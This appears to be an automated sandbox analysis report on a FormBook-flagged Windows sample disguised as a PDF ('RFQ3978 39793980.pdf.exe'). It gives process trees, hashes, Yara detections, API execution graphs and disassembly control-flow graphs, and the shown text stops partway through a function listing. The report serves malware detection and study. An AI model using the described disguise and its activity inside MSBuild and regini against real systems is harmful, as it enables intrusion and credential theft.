                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED]
                                                                                                            Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body>... partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a>... partial --> </body></html>


                                                                                                            Statistics

                                                                                                            CPU Usage

                                                                                                            Click to jump to process

                                                                                                            Memory Usage

                                                                                                            Click to jump to process

                                                                                                            High Level Behavior Distribution

                                                                                                            Click to dive into process behavior distribution

                                                                                                            Behavior

                                                                                                            Click to jump to process

                                                                                                            System Behavior

                                                                                                            General

                                                                                                            Target ID:0
                                                                                                            Start time:15:46:53
                                                                                                            Start date:12/12/2024
                                                                                                            Path:C:\Users\user\Desktop\RFQ3978 39793980.pdf.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Users\user\Desktop\RFQ3978 39793980.pdf.exe"
                                                                                                            Imagebase:0x400000
                                                                                                            File size:861'696 bytes
                                                                                                            MD5 hash:3979572152F3FB2B98211EEB761309AF
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:low
                                                                                                            Has exited:true

                                                                                                            General

                                                                                                            Target ID:5
                                                                                                            Start time:15:47:29
                                                                                                            Start date:12/12/2024
                                                                                                            Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                                                            Imagebase:0x7ff799140000
                                                                                                            File size:262'432 bytes
                                                                                                            MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                                                                                                            Has elevated privileges:true
                                                                                                            Has administrator privileges:true
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2352159406.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2352816417.0000000000FD0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2354528034.0000000002830000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            General

                                                                                                            Target ID:6
                                                                                                            Start time:15:47:51
                                                                                                            Start date:12/12/2024
                                                                                                            Path:C:\Program Files (x86)\olVPGATOUBXOLYArLwmXYmsTfaxnIbOZayBTJkZykeIPbvMUR\shazRxxmQwU.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Program Files (x86)\olVPGATOUBXOLYArLwmXYmsTfaxnIbOZayBTJkZykeIPbvMUR\shazRxxmQwU.exe"
                                                                                                            Imagebase:0xb80000
                                                                                                            File size:140'800 bytes
                                                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                            Has elevated privileges:false
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3561019858.00000000039F0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                            Reputation:high
                                                                                                            Has exited:false

                                                                                                            General

                                                                                                            Target ID:7
                                                                                                            Start time:15:47:53
                                                                                                            Start date:12/12/2024
                                                                                                            Path:C:\Windows\SysWOW64\regini.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Windows\SysWOW64\regini.exe"
                                                                                                            Imagebase:0x670000
                                                                                                            File size:41'472 bytes
                                                                                                            MD5 hash:C99C3BB423097FCF4990539FC1ED60E3
                                                                                                            Has elevated privileges:false
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3560935486.0000000002A20000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3559804880.00000000004A0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3560872245.00000000029D0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                            Reputation:moderate
                                                                                                            Has exited:false

                                                                                                            General

                                                                                                            Target ID:8
                                                                                                            Start time:15:48:06
                                                                                                            Start date:12/12/2024
                                                                                                            Path:C:\Program Files (x86)\olVPGATOUBXOLYArLwmXYmsTfaxnIbOZayBTJkZykeIPbvMUR\shazRxxmQwU.exe
                                                                                                            Wow64 process (32bit):true
                                                                                                            Commandline:"C:\Program Files (x86)\olVPGATOUBXOLYArLwmXYmsTfaxnIbOZayBTJkZykeIPbvMUR\shazRxxmQwU.exe"
                                                                                                            Imagebase:0xb80000
                                                                                                            File size:140'800 bytes
                                                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                            Has elevated privileges:false
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Yara matches:
                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.3560408446.0000000001230000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                            Reputation:high
                                                                                                            Has exited:false

                                                                                                            General

                                                                                                            Target ID:10
                                                                                                            Start time:15:48:18
                                                                                                            Start date:12/12/2024
                                                                                                            Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                            Wow64 process (32bit):false
                                                                                                            Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                                            Imagebase:0x7ff6bf500000
                                                                                                            File size:676'768 bytes
                                                                                                            MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                                            Has elevated privileges:false
                                                                                                            Has administrator privileges:false
                                                                                                            Programmed in:C, C++ or other language
                                                                                                            Reputation:high
                                                                                                            Has exited:true

                                                                                                            Disassembly

                                                                                                            Reset < >

                                                                                                              Execution Graph

                                                                                                              Execution Coverage:11.8%
                                                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                                                              Signature Coverage:5.7%
                                                                                                              Total number of Nodes:158
                                                                                                              Total number of Limit Nodes:8
                                                                                                              execution_graph 31180 25bd4d8 31181 25bd51e 31180->31181 31184 25bd6b8 31181->31184 31187 25bb830 31184->31187 31188 25bd720 DuplicateHandle 31187->31188 31189 25bd60b 31188->31189 31190 4d44050 31191 4d44092 31190->31191 31193 4d44099 31190->31193 31192 4d440ea CallWindowProcW 31191->31192 31191->31193 31192->31193 31194 73159b4 31198 7317cc0 31194->31198 31201 7317cb8 31194->31201 31195 73159e5 31199 7317d08 VirtualProtect 31198->31199 31200 7317d42 31199->31200 31200->31195 31202 7317d08 VirtualProtect 31201->31202 31203 7317d42 31202->31203 31203->31195 31208 25bad50 31212 25bae48 31208->31212 31217 25bae40 31208->31217 31209 25bad5f 31213 25bae7c 31212->31213 31214 25bae59 31212->31214 31213->31209 31214->31213 31215 25bb080 GetModuleHandleW 31214->31215 31216 25bb0ad 31215->31216 31216->31209 31218 25bae59 31217->31218 31219 25bae7c 31217->31219 31218->31219 31220 25bb080 GetModuleHandleW 31218->31220 31219->31209 31221 25bb0ad 31220->31221 31221->31209 31335 4d487bb 31336 4d487c0 31335->31336 31337 4d47d90 2 API calls 31336->31337 31338 4d487cf 31337->31338 31339 73166c1 31341 73166c4 31339->31341 31340 7316729 31341->31340 31342 7317cc0 VirtualProtect 31341->31342 31343 7317cb8 VirtualProtect 31341->31343 31342->31341 31343->31341 31344 25b4668 31345 25b467a 31344->31345 31346 25b4686 31345->31346 31350 25b4783 31345->31350 31355 25b3e28 31346->31355 31348 25b46a5 31351 25b479d 31350->31351 31359 25b4888 31351->31359 31363 25b4887 31351->31363 31352 25b47a7 31352->31346 31356 25b3e33 31355->31356 31371 25b5c68 31356->31371 31358 25b6ff6 31358->31348 31360 25b48af 31359->31360 31362 25b498c 31360->31362 31367 25b44b0 31360->31367 31362->31352 31365 25b48af 31363->31365 31364 25b498c 31364->31352 31365->31364 31366 25b44b0 CreateActCtxA 31365->31366 31366->31364 31368 25b5918 CreateActCtxA 31367->31368 31370 25b59db 31368->31370 31370->31370 31372 25b5c73 31371->31372 31375 25b5c88 31372->31375 31374 25b7195 31374->31358 31376 25b5c93 31375->31376 31379 25b5cb8 31376->31379 31378 25b727a 31378->31374 31380 25b5cc3 31379->31380 31381 25b5ce8 2 API calls 31380->31381 31382 25b736d 31381->31382 31382->31378 31222 4d46dc0 31223 4d46ded 31222->31223 31234 4d4662c 31223->31234 31226 4d4662c 2 API calls 31227 4d46eb7 31226->31227 31228 4d4662c 2 API calls 31227->31228 31229 4d46ee9 31228->31229 31238 4d4663c 31229->31238 31231 4d46f1b 31244 4d46c10 31231->31244 31233 4d46f4d 31235 4d46637 31234->31235 31248 4d46d20 31235->31248 31237 4d46e85 31237->31226 31239 4d46647 31238->31239 31241 25b83a8 2 API calls 31239->31241 31242 25b5ce8 2 API calls 31239->31242 31243 25b5d47 2 API calls 31239->31243 31240 4d48396 31240->31231 31241->31240 31242->31240 31243->31240 31245 4d46c1b 31244->31245 31321 4d47d90 31245->31321 31247 4d487cf 31247->31233 31249 4d46d2b 31248->31249 31254 25b83a8 31249->31254 31259 25b5d47 31249->31259 31265 25b5ce8 31249->31265 31250 4d480ac 31250->31237 31255 25b83e3 31254->31255 31256 25b86a9 31255->31256 31270 25bce0f 31255->31270 31275 25bce10 31255->31275 31256->31250 31260 25b5d4b 31259->31260 31262 25b5cf3 31259->31262 31260->31250 31261 25b86a9 31261->31250 31262->31261 31263 25bce0f 2 API calls 31262->31263 31264 25bce10 2 API calls 31262->31264 31263->31261 31264->31261 31266 25b5cf3 31265->31266 31267 25b86a9 31266->31267 31268 25bce0f 2 API calls 31266->31268 31269 25bce10 2 API calls 31266->31269 31267->31250 31268->31267 31269->31267 31271 25bce31 31270->31271 31272 25bce55 31271->31272 31280 25bcfbf 31271->31280 31284 25bcfc0 31271->31284 31272->31256 31276 25bce31 31275->31276 31277 25bce55 31276->31277 31278 25bcfbf 2 API calls 31276->31278 31279 25bcfc0 2 API calls 31276->31279 31277->31256 31278->31277 31279->31277 31282 25bcfcd 31280->31282 31281 25bd007 31281->31272 31282->31281 31288 25bb820 31282->31288 31285 25bcfcd 31284->31285 31286 25bd007 31285->31286 31287 25bb820 2 API calls 31285->31287 31286->31272 31287->31286 31289 25bb82b 31288->31289 31290 25bdd18 31289->31290 31292 25bd124 31289->31292 31293 25bd12f 31292->31293 31294 25b5ce8 2 API calls 31293->31294 31295 25bdd87 31294->31295 31298 25bfb08 31295->31298 31296 25bddc1 31296->31290 31299 25bfb39 31298->31299 31300 25bfb45 31298->31300 31299->31300 31303 4d409c0 31299->31303 31308 4d409bf 31299->31308 31300->31296 31304 4d409eb 31303->31304 31305 4d40a9a 31304->31305 31313 4d418a0 31304->31313 31317 4d4189f 31304->31317 31305->31305 31309 4d409eb 31308->31309 31310 4d40a9a 31309->31310 31311 4d418a0 2 API calls 31309->31311 31312 4d4189f 2 API calls 31309->31312 31311->31310 31312->31310 31314 4d418d5 31313->31314 31315 4d418e4 CreateWindowExW 31313->31315 31316 4d418f0 CreateWindowExW 31313->31316 31314->31305 31315->31314 31316->31314 31319 4d418e4 CreateWindowExW 31317->31319 31320 4d418f0 CreateWindowExW 31317->31320 31318 4d418d5 31318->31305 31319->31318 31320->31318 31322 4d47d9b 31321->31322 31323 4d48802 31322->31323 31324 25b83a8 2 API calls 31322->31324 31325 25b5ce8 2 API calls 31322->31325 31326 25b5d47 2 API calls 31322->31326 31323->31247 31324->31323 31325->31323 31326->31323 31383 7315f46 31385 7317cc0 VirtualProtect 31383->31385 31386 7317cb8 VirtualProtect 31383->31386 31384 7315f5d 31385->31384 31386->31384

                                                                                                              Executed Functions

                                                                                                              Function 07312C97 Relevance: 4.1, Strings: 3, Instructions: 312COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 526 7312c97-7312ca0 527 7312ca2-7312caa 526->527 528 7312cc4-7312cf1 526->528 527->528 530 7312cf3-7312d1d 528->530 531 7312d29-7312d60 528->531 533 7312d24-7312d26 530->533 534 7312d1f 530->534 601 7312d62 call 73132b0 531->601 602 7312d62 call 73132a0 531->602 533->531 534->533 536 7312d68 537 7312d6f-7312d8b 536->537 538 7312d94-7312d95 537->538 539 7312d8d 537->539 540 73130eb-73130f2 538->540 541 7312d9a-7312d9e 538->541 539->536 539->540 539->541 542 7312e10-7312e28 539->542 543 7312f73-7312f88 539->543 544 7312ddb-7312de4 539->544 545 731307b-73130a0 539->545 546 7312fbd-7312fc1 539->546 547 7312e7d-7312e9b 539->547 548 7312f61-7312f6e 539->548 549 7312ea0-7312eac 539->549 550 73130a5-73130b1 539->550 551 7312f47-7312f5c 539->551 552 7312dc7-7312dd9 539->552 553 7312f06-7312f26 539->553 554 7312e66-7312e78 539->554 555 7312f2b-7312f42 539->555 556 7312eca-7312eea 539->556 557 7312f8d-7312f91 539->557 558 7312fed-7312ff9 539->558 559 7312eef-7312f01 539->559 560 73130cf-73130e6 539->560 563 7312db1-7312db8 541->563 564 7312da0-7312daf 541->564 569 7312e2a 542->569 570 7312e2f 542->570 543->537 565 7312df7-7312dfe 544->565 566 7312de6-7312df5 544->566 545->537 573 7312fc3-7312fd2 546->573 574 7312fd4-7312fdb 546->574 547->537 548->537 561 7312eb3-7312ec5 549->561 562 7312eae 549->562 567 73130b3 550->567 568 73130b8-73130ca 550->568 551->537 552->537 553->537 554->537 555->537 556->537 571 7312f93-7312fa2 557->571 572 7312fa4-7312fab 557->572 575 7313000-7313016 558->575 576 7312ffb 558->576 559->537 560->537 561->537 562->561 579 7312dbf-7312dc5 563->579 564->579 580 7312e05-7312e0b 565->580 566->580 567->568 568->537 569->570 588 7312e39-7312e45 570->588 583 7312fb2-7312fb8 571->583 572->583 584 7312fe2-7312fe8 573->584 574->584 589 7313018 575->589 590 731301d-7313033 575->590 576->575 579->537 580->537 583->537 584->537 591 7312e47 588->591 592 7312e4c-7312e61 588->592 589->590 595 7313035 590->595 596 731303a-7313050 590->596 591->592 592->537 595->596 598 7313052 596->598 599 7313057-7313076 596->599 598->599 599->537 601->536 602->536
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2082736098.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7310000_RFQ3978 39793980.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: ry$ry$ry
                                                                                                              • API String ID: 0-128149707
                                                                                                              • Opcode ID: f6da0587aaaf4634b5c81e463d34960c2288251b17cd87f57fec849a50ffb019
                                                                                                              • Instruction ID: 8e482067a94882382827f4435d886de1c9562aee8b9ecde922f37ea4b09aa4cd
                                                                                                              • Opcode Fuzzy Hash: f6da0587aaaf4634b5c81e463d34960c2288251b17cd87f57fec849a50ffb019
                                                                                                              • Instruction Fuzzy Hash: 52D18DB5E1520ADFDB18DFA5C4814AEFBB6FF89300F10C456E416AB218D734AA42CF94
                                                                                                              Function 07312CAF Relevance: 4.1, Strings: 3, Instructions: 308COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 603 7312caf-7312cf1 606 7312cf3-7312d1d 603->606 607 7312d29-7312d60 603->607 609 7312d24-7312d26 606->609 610 7312d1f 606->610 677 7312d62 call 73132b0 607->677 678 7312d62 call 73132a0 607->678 609->607 610->609 612 7312d68 613 7312d6f-7312d8b 612->613 614 7312d94-7312d95 613->614 615 7312d8d 613->615 616 73130eb-73130f2 614->616 617 7312d9a-7312d9e 614->617 615->612 615->616 615->617 618 7312e10-7312e28 615->618 619 7312f73-7312f88 615->619 620 7312ddb-7312de4 615->620 621 731307b-73130a0 615->621 622 7312fbd-7312fc1 615->622 623 7312e7d-7312e9b 615->623 624 7312f61-7312f6e 615->624 625 7312ea0-7312eac 615->625 626 73130a5-73130b1 615->626 627 7312f47-7312f5c 615->627 628 7312dc7-7312dd9 615->628 629 7312f06-7312f26 615->629 630 7312e66-7312e78 615->630 631 7312f2b-7312f42 615->631 632 7312eca-7312eea 615->632 633 7312f8d-7312f91 615->633 634 7312fed-7312ff9 615->634 635 7312eef-7312f01 615->635 636 73130cf-73130e6 615->636 639 7312db1-7312db8 617->639 640 7312da0-7312daf 617->640 645 7312e2a 618->645 646 7312e2f 618->646 619->613 641 7312df7-7312dfe 620->641 642 7312de6-7312df5 620->642 621->613 649 7312fc3-7312fd2 622->649 650 7312fd4-7312fdb 622->650 623->613 624->613 637 7312eb3-7312ec5 625->637 638 7312eae 625->638 643 73130b3 626->643 644 73130b8-73130ca 626->644 627->613 628->613 629->613 630->613 631->613 632->613 647 7312f93-7312fa2 633->647 648 7312fa4-7312fab 633->648 651 7313000-7313016 634->651 652 7312ffb 634->652 635->613 636->613 637->613 638->637 655 7312dbf-7312dc5 639->655 640->655 656 7312e05-7312e0b 641->656 642->656 643->644 644->613 645->646 664 7312e39-7312e45 646->664 659 7312fb2-7312fb8 647->659 648->659 660 7312fe2-7312fe8 649->660 650->660 665 7313018 651->665 666 731301d-7313033 651->666 652->651 655->613 656->613 659->613 660->613 667 7312e47 664->667 668 7312e4c-7312e61 664->668 665->666 671 7313035 666->671 672 731303a-7313050 666->672 667->668 668->613 671->672 674 7313052 672->674 675 7313057-7313076 672->675 674->675 675->613 677->612 678->612
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2082736098.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7310000_RFQ3978 39793980.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: ry$ry$ry
                                                                                                              • API String ID: 0-128149707
                                                                                                              • Opcode ID: f737f2ff24e44617c5d18d46a679320d498e1d1edec3a622a34d834ce155fe6b
                                                                                                              • Instruction ID: 0152c41497f2d620e8df82f97b858304aecd566b3ffacdb534f11627b22bba69
                                                                                                              • Opcode Fuzzy Hash: f737f2ff24e44617c5d18d46a679320d498e1d1edec3a622a34d834ce155fe6b
                                                                                                              • Instruction Fuzzy Hash: FFD17CB5E1420ADFDB18DFA5C4854AEFBB6FF89300F10D456E416AB218D734AA42CF94
                                                                                                              Function 07312CF8 Relevance: 4.0, Strings: 3, Instructions: 284COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 679 7312cf8-7312d1d 680 7312d24-7312d60 679->680 681 7312d1f 679->681 749 7312d62 call 73132b0 680->749 750 7312d62 call 73132a0 680->750 681->680 684 7312d68 685 7312d6f-7312d8b 684->685 686 7312d94-7312d95 685->686 687 7312d8d 685->687 688 73130eb-73130f2 686->688 689 7312d9a-7312d9e 686->689 687->684 687->688 687->689 690 7312e10-7312e28 687->690 691 7312f73-7312f88 687->691 692 7312ddb-7312de4 687->692 693 731307b-73130a0 687->693 694 7312fbd-7312fc1 687->694 695 7312e7d-7312e9b 687->695 696 7312f61-7312f6e 687->696 697 7312ea0-7312eac 687->697 698 73130a5-73130b1 687->698 699 7312f47-7312f5c 687->699 700 7312dc7-7312dd9 687->700 701 7312f06-7312f26 687->701 702 7312e66-7312e78 687->702 703 7312f2b-7312f42 687->703 704 7312eca-7312eea 687->704 705 7312f8d-7312f91 687->705 706 7312fed-7312ff9 687->706 707 7312eef-7312f01 687->707 708 73130cf-73130e6 687->708 711 7312db1-7312db8 689->711 712 7312da0-7312daf 689->712 717 7312e2a 690->717 718 7312e2f 690->718 691->685 713 7312df7-7312dfe 692->713 714 7312de6-7312df5 692->714 693->685 721 7312fc3-7312fd2 694->721 722 7312fd4-7312fdb 694->722 695->685 696->685 709 7312eb3-7312ec5 697->709 710 7312eae 697->710 715 73130b3 698->715 716 73130b8-73130ca 698->716 699->685 700->685 701->685 702->685 703->685 704->685 719 7312f93-7312fa2 705->719 720 7312fa4-7312fab 705->720 723 7313000-7313016 706->723 724 7312ffb 706->724 707->685 708->685 709->685 710->709 727 7312dbf-7312dc5 711->727 712->727 728 7312e05-7312e0b 713->728 714->728 715->716 716->685 717->718 736 7312e39-7312e45 718->736 731 7312fb2-7312fb8 719->731 720->731 732 7312fe2-7312fe8 721->732 722->732 737 7313018 723->737 738 731301d-7313033 723->738 724->723 727->685 728->685 731->685 732->685 739 7312e47 736->739 740 7312e4c-7312e61 736->740 737->738 743 7313035 738->743 744 731303a-7313050 738->744 739->740 740->685 743->744 746 7313052 744->746 747 7313057-7313076 744->747 746->747 747->685 749->684 750->684
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2082736098.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7310000_RFQ3978 39793980.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: ry$ry$ry
                                                                                                              • API String ID: 0-128149707
                                                                                                              • Opcode ID: 5f8826648f9be1c6843b5689ab7c0615db88e93cdf08a30fd3c856af63866923
                                                                                                              • Instruction ID: 0f041df7d8b28333469eb9c4ee4f87eff3771564a8210be6c7eed72880096212
                                                                                                              • Opcode Fuzzy Hash: 5f8826648f9be1c6843b5689ab7c0615db88e93cdf08a30fd3c856af63866923
                                                                                                              • Instruction Fuzzy Hash: 4AC18CB5E1420ADFDB18DF95C4858AEFBB6FF89300F10D455E416AB218D734AA82CF94
                                                                                                              Function 07310B3D Relevance: 4.0, Strings: 3, Instructions: 249COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 751 7310b3d-7310bb3 753 7310bb5 751->753 754 7310bba-7310c14 751->754 753->754 757 7310c17 754->757 758 7310c1e-7310c3a 757->758 759 7310c43-7310c44 758->759 760 7310c3c 758->760 761 7310df0-7310e60 759->761 769 7310c49-7310c71 759->769 760->757 760->761 762 7310d93-7310dae 760->762 763 7310c73-7310c85 760->763 764 7310db3-7310dca 760->764 765 7310cdc-7310d06 760->765 766 7310d60-7310d6d 760->766 767 7310c87-7310ca7 760->767 768 7310d46-7310d5b 760->768 760->769 770 7310d0b-7310d41 760->770 771 7310cac-7310cb0 760->771 772 7310dcf-7310deb 760->772 788 7310e62 call 7312b37 761->788 789 7310e62 call 7312766 761->789 790 7310e62 call 7312ae8 761->790 791 7310e62 call 7311e88 761->791 792 7310e62 call 731214b 761->792 793 7310e62 call 7311e7a 761->793 762->758 763->758 764->758 765->758 784 7310d76-7310d8e 766->784 767->758 768->758 769->758 770->758 773 7310cc3-7310cca 771->773 774 7310cb2-7310cc1 771->774 772->758 775 7310cd1-7310cd7 773->775 774->775 775->758 784->758 787 7310e68-7310e72 788->787 789->787 790->787 791->787 792->787 793->787
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2082736098.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7310000_RFQ3978 39793980.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: Te^q$Te^q$z^I
                                                                                                              • API String ID: 0-2886491258
                                                                                                              • Opcode ID: ddbd5d880086f0b00bf0dca097b7d31af856f8d7549b38ee8c71469b9a21a1cd
                                                                                                              • Instruction ID: 9a2e111dcc89cffd094e6a81307fa85e1942bc40c4f084bf5e05b3bbb87f0016
                                                                                                              • Opcode Fuzzy Hash: ddbd5d880086f0b00bf0dca097b7d31af856f8d7549b38ee8c71469b9a21a1cd
                                                                                                              • Instruction Fuzzy Hash: A2A115B5E102098FDB08CFA9C5846DDFBB6FF89310F24942AD419AB364D7349986CF54
                                                                                                              Function 07310B77 Relevance: 4.0, Strings: 3, Instructions: 223COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 794 7310b77-7310bb3 795 7310bb5 794->795 796 7310bba-7310c14 794->796 795->796 799 7310c17 796->799 800 7310c1e-7310c3a 799->800 801 7310c43-7310c44 800->801 802 7310c3c 800->802 803 7310df0-7310e60 801->803 811 7310c49-7310c71 801->811 802->799 802->803 804 7310d93-7310dae 802->804 805 7310c73-7310c85 802->805 806 7310db3-7310dca 802->806 807 7310cdc-7310d06 802->807 808 7310d60-7310d6d 802->808 809 7310c87-7310ca7 802->809 810 7310d46-7310d5b 802->810 802->811 812 7310d0b-7310d41 802->812 813 7310cac-7310cb0 802->813 814 7310dcf-7310deb 802->814 830 7310e62 call 7312b37 803->830 831 7310e62 call 7312766 803->831 832 7310e62 call 7312ae8 803->832 833 7310e62 call 7311e88 803->833 834 7310e62 call 731214b 803->834 835 7310e62 call 7311e7a 803->835 804->800 805->800 806->800 807->800 826 7310d76-7310d8e 808->826 809->800 810->800 811->800 812->800 815 7310cc3-7310cca 813->815 816 7310cb2-7310cc1 813->816 814->800 817 7310cd1-7310cd7 815->817 816->817 817->800 826->800 829 7310e68-7310e72 830->829 831->829 832->829 833->829 834->829 835->829
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2082736098.0000000007310000.00000040.00000800.00020000.00000000.sdmp, Offset: 07310000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7310000_RFQ3978 39793980.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: Te^q$Te^q$z^I
                                                                                                              • API String ID: 0-2886491258
                                                                                                              • Opcode ID: b92cc0f86e2bb99fba6e6835fdc653452473fd13e56b89d3f9d7cf310138424c
                                                                                                              • Instruction ID: 5ba56b5873cddab69075ce08a32efa43c7b96e0729652a5445d31ebed319a62d
                                                                                                              • Opcode Fuzzy Hash: b92cc0f86e2bb99fba6e6835fdc653452473fd13e56b89d3f9d7cf310138424c
                                                                                                              • Instruction Fuzzy Hash: 2091D2B4E102198FDB08CFAAC584ADEFBB6FF89300F24942AD459AB364D7349945CF54
                                                                                                              Function 07310B90 Relevance: 4.0, Strings: 3, Instructions: 219COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
